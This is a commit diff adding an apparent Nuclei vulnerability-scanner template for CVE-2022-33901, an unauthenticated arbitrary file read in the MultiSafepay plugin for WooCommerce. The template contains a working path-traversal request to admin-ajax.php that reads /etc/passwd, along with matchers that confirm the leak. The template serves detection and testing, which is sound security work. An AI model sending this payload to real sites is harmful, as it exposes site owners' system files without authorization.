Added template for CVE-2022-33901
parent
7a1c8e1429
commit
67851d5c3d
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2022-33901
|
||||
|
||||
info:
|
||||
name: MultiSafepay plugin for WooCommerce <= 4.13.1 - Unauthenticated Arbitrary File Read
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.
|
||||
reference:
|
||||
- https://wordpress.org/plugins/multisafepay/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-33901
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-33901
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wp-plugin,wp,fileread,unauth,wpscan,cve2022,wordpress,cve,multisafepay
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/octet-stream"
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
Loading…
Reference in New Issue